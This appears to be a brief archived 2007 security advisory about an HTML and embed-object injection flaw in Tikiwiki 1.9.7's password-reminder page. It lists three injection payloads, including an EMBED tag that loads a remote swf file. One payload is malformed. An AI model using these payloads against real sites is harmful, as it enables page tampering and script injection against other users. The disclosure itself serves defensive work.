Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:17884
HistoryAug 25, 2007 - 12:00 a.m.

Tikiwiki 1.9.7 HTML/embed object injection

2007-08-2500:00:00
vulners.com
58

Tikiwiki
Version: 1.9.7

Example Address
http://example.com/tiki-remind_password.php

Overview:
The following codes can be added to the HTML password page by placing the HTML codes in the user name input box and hitting the "send me my password" button.

Examples:
1.<br><br><b><u>XSS</u></b>
2.<EMBED SRC="http://site.com/xss.swf&quot;
3.<html><fontcolor="Red"><b>Pwned</b></font></html>